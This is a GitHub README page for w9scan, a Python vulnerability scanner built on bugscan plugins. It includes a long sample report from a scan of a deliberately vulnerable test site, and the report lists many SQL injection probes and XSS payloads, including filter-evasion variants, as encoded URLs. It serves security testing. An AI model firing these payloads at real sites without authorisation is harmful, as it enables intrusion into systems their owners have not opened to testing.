Skip to content
/ w9scan Public
forked from gmhzxy/w9scan

一款兼容bugscan插件的扫描器

1 star 60 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

sco4x0/w9scan

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

60 Commits
.idea
.idea
 
 
dummy
dummy
 
 
images
images
 
 
lib
lib
 
 
plugins
plugins
 
 
thirdparty
thirdparty
 
 
README.MD
README.MD
 
 
test.py
test.py
 
 
w9scan.py
w9scan.py
 
 

Repository files navigation

w9scan

这款扫描器将不仅仅只能调用bugscan插件,会不断升级,结合github上各种扫描器优秀项目,做一个niub的扫描器!环境只需要python 2.7 即可,且不需要安装其他第三方库,支持Windos/Linux系统。如果觉得本程序能帮助到你欢迎点个Star,如果不参与开发,请不要点击Fork

目标

  • Linux/Windos通用
  • python不额外安装第三方库
  • 做开源扫描器中的 Top1

升级记录

  • 接下来要做的: 完善报错机制 bug反馈机制 生成HTML格式扫描报告 扫描器架构简介,插件编写指南

  • 1.5.0 实现了子域名解析爆破(用特殊的方法10行代码完成 hO(∩_∩)Oh) 可以看文件subdomain.py

  • 1.4.3 加入了WAF/CDN探测模块waf_identify.py 感谢WebEye的代码以及指纹信息

  • 1.4.2 加入爬虫的备份文件探测模块 参考bcrpscan

  • 1.4.1 完成了爬虫的信息收集模块和XSS扫描模块 ,SQL注入以及XSS扫描代码参考https://github.com/youmengxuefei/web_vul_scan

  • 元旦了,祝自己快乐

  • 1.4.0 完成爬虫模块[单线程] 完成sql注入模块 包含int注入 字符注入 报错查找

  • 1.3.3 解决了程序异常,去掉了老的线程池,改用了POC-T的线程引擎

  • 1.3.2 分类了exp文件夹,使整理更方便

  • 1.3.1 部分插件加入了线程池,使速度更快了 添加了部分插件

  • 1.3 加入线程池,使速度更快了 内置buildtwitch分析网站结构

  • 1.2 加入了IP端口服务识别,对IP开放端口定向识别并破解

  • 1.1 扫描器雏形,指纹识别雏形

FAQ

  • 兼容bugscan插件?
    程序设计就是通过调用bugscan插件运行的,bugscan插件均为网上收集
  • 插件内置吗?
    内置1000+插件,不断更新中
  • 感觉没有想象中的好用啊
    倒是说说你想怎么好用呀?
  • 一千多个脚本对目标站轮训?
    先调用www服务的插件,由这些插件在调用其他插件指纹识别 端口服务识别等。

免责

w9scan扫描器项目仅用于学习,禁止用于其他用途。

运行测试

Linux

w9scan 1.4.2 扫描 http://testphp.vulnweb.com/ 的扫描报告:

      [Note] php version:5.3.0 - current
      [Note] 存在crossdomain.xml文件发现漏洞...(信息) payload: http://testphp.vulnweb.com//crossdomain.xml
      [Note] http://testphp.vulnweb.com/['php']
      [Info] IP:176.28.50.165
      [Note] udp/53=>[DNS];Ver =>none
      [Note] TCP: [21, 22, 25, 80]
      [Note] 80 => [www]; Ver => [('Server', 'nginx/1.4.1'), ('X-Powered-By', 'PHP/5.3.10-1~lucid+2uwsgi2')]
21 => [ftp]; Ver => 220 ProFTPD 1.3.3e Server (ProFTPD) [176.28.50.165]
[***] Scan report:
      [Note] Infomation Collect:wvs@acunetix.com
      [Note] Infomation Collect:wvs@acunetix.com
      [Hole] [Integer SQL injection] http://testphp.vulnweb.com/artists.php?artist=1 GET /artists.php?artist=1%2B1-1 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/artists.php?artist=1 GET /artists.php?artist=1/%2A%2A/and/%2A%2A/1%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/artists.php?artist=1 GET /artists.php?artist=1%09and%091%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/artists.php?artist=1 GET /artists.php?artist=1%0Aand/%2A%2A/1%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Note] Infomation Collect:wvs@acunetix.com
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/artists.php?artist=1 mysql_fetch_array()GET /artists.php?artist=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/artists.php?artist=1 mysql_GET /artists.php?artist=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Note] Infomation Collect:wvs@acunetix.com
      [Note] Infomation Collect:wvs@acunetix.com
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Cscript%3Ealert%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Cscript%3Eprompt%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Cscript%3Econfirm%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C/scr%3Cscript%3Eipt%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Cobject%20data%3D%22data%3Atext/html%3Bbase64%2CPHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4%3D%22%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Csvg/onload%3Dprompt%281%29%3B%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Cmarquee/onstart%3Dconfirm%281%29%3E/
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Cbody%20onload%3Dprompt%281%29%3B%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Cselect%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Ctextarea%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Ckeygen%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?cat=%3Cvideo%3E%3Csource%20onerror%3D%22javascript%3Aalert%281%29%22%3E
      [Hole] [Integer SQL injection] http://testphp.vulnweb.com/listproducts.php?cat=1 GET /listproducts.php?cat=1%2B1-1 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/listproducts.php?cat=1 GET /listproducts.php?cat=1/%2A%2A/and/%2A%2A/1%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/listproducts.php?cat=1 GET /listproducts.php?cat=1%09and%091%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/listproducts.php?cat=1 GET /listproducts.php?cat=1%0Aand/%2A%2A/1%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Note] Infomation Collect:wvs@acunetix.com
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/listproducts.php?cat=1 mysql_fetch_array()GET /listproducts.php?cat=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/listproducts.php?cat=1 mysql_GET /listproducts.php?cat=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/listproducts.php?cat=1 You have an error in your SQL syntax;GET /listproducts.php?cat=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/listproducts.php?cat=1 MySQL server version for the right syntax to useGET /listproducts.php?cat=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Note] Infomation Collect:wvs@acunetix.com
      [Note] Infomation Collect:wvs@acunetix.com
      [Note] Infomation Collect:wvs@acunetix.com
      [Note] Infomation Collect:wvs@acunetix.com
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Cscript%3Ealert%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Cscript%3Eprompt%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Cscript%3Econfirm%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C/scr%3Cscript%3Eipt%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Cobject%20data%3D%22data%3Atext/html%3Bbase64%2CPHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4%3D%22%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Csvg/onload%3Dprompt%281%29%3B%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Cmarquee/onstart%3Dconfirm%281%29%3E/
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Cbody%20onload%3Dprompt%281%29%3B%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Cselect%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Ctextarea%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Ckeygen%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/listproducts.php?artist=%3Cvideo%3E%3Csource%20onerror%3D%22javascript%3Aalert%281%29%22%3E
      [Hole] [Integer SQL injection] http://testphp.vulnweb.com/listproducts.php?artist=1 GET /listproducts.php?artist=1%2B1-1 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/listproducts.php?artist=1 GET /listproducts.php?artist=1/%2A%2A/and/%2A%2A/1%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/listproducts.php?artist=1 GET /listproducts.php?artist=1%09and%091%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/listproducts.php?artist=1 GET /listproducts.php?artist=1%0Aand/%2A%2A/1%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Note] Infomation Collect:wvs@acunetix.com
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/listproducts.php?artist=1 mysql_fetch_array()GET /listproducts.php?artist=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/listproducts.php?artist=1 mysql_GET /listproducts.php?artist=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/listproducts.php?artist=1 You have an error in your SQL syntax;GET /listproducts.php?artist=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/listproducts.php?artist=1 MySQL server version for the right syntax to useGET /listproducts.php?artist=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [Integer SQL injection] http://testphp.vulnweb.com/product.php?pic=1 GET /product.php?pic=1%2B1-1 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/product.php?pic=1 GET /product.php?pic=1/%2A%2A/and/%2A%2A/1%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/product.php?pic=1 GET /product.php?pic=1%09and%091%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [String SQL injection] http://testphp.vulnweb.com/product.php?pic=1 GET /product.php?pic=1%0Aand/%2A%2A/1%3B%23 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Note] Infomation Collect:wvs@acunetix.com
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/product.php?pic=1 mysql_fetch_array()GET /product.php?pic=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Hole] [Error SQL Found MySQL database] http://testphp.vulnweb.com/product.php?pic=1 mysql_GET /product.php?pic=1%27 HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
      [Note] Infomation Collect:wvs@acunetix.com
      [Note] Infomation Collect:wvs@acunetix.com
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Cscript%3Ealert%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Cscript%3Eprompt%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Cscript%3Econfirm%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C/scr%3Cscript%3Eipt%3E
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Cobject%20data%3D%22data%3Atext/html%3Bbase64%2CPHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4%3D%22%3E
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Csvg/onload%3Dprompt%281%29%3B%3E
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Cmarquee/onstart%3Dconfirm%281%29%3E/
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Cbody%20onload%3Dprompt%281%29%3B%3E
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Cselect%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Ctextarea%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Ckeygen%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/showimage.php?file=%3Cvideo%3E%3Csource%20onerror%3D%22javascript%3Aalert%281%29%22%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Cscript%3Ealert%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Cscript%3Eprompt%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Cscript%3Econfirm%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C/scr%3Cscript%3Eipt%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Cobject%20data%3D%22data%3Atext/html%3Bbase64%2CPHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4%3D%22%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Csvg/onload%3Dprompt%281%29%3B%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Cmarquee/onstart%3Dconfirm%281%29%3E/
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Cbody%20onload%3Dprompt%281%29%3B%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Cselect%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Ctextarea%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Ckeygen%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/?pp=%3Cvideo%3E%3Csource%20onerror%3D%22javascript%3Aalert%281%29%22%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Cscript%3Ealert%281%29%3B%3C/script%3E&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Cscript%3Eprompt%281%29%3B%3C/script%3E&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Cscript%3Econfirm%281%29%3B%3C/script%3E&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C/scr%3Cscript%3Eipt%3E&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Cobject%20data%3D%22data%3Atext/html%3Bbase64%2CPHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4%3D%22%3E&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Csvg/onload%3Dprompt%281%29%3B%3E&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Cmarquee/onstart%3Dconfirm%281%29%3E/&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Cbody%20onload%3Dprompt%281%29%3B%3E&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Cselect%20autofocus%20onfocus%3Dalert%281%29%3E&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Ctextarea%20autofocus%20onfocus%3Dalert%281%29%3E&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Ckeygen%20autofocus%20onfocus%3Dalert%281%29%3E&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=%3Cvideo%3E%3Csource%20onerror%3D%22javascript%3Aalert%281%29%22%3E&pp=12
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Cscript%3Ealert%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Cscript%3Eprompt%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Cscript%3Econfirm%281%29%3B%3C/script%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Cscr%3Cscript%3Eipt%3Ealert%281%29%3C/scr%3Cscript%3Eipt%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Cobject%20data%3D%22data%3Atext/html%3Bbase64%2CPHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4%3D%22%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Csvg/onload%3Dprompt%281%29%3B%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Cmarquee/onstart%3Dconfirm%281%29%3E/
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Cbody%20onload%3Dprompt%281%29%3B%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Cselect%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Ctextarea%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Ckeygen%20autofocus%20onfocus%3Dalert%281%29%3E
      [Hole] [XSS] http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=%3Cvideo%3E%3Csource%20onerror%3D%22javascript%3Aalert%281%29%22%3E
[***] Report end

Useage

python w9scan.py

Thx

About

一款兼容bugscan插件的扫描器

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%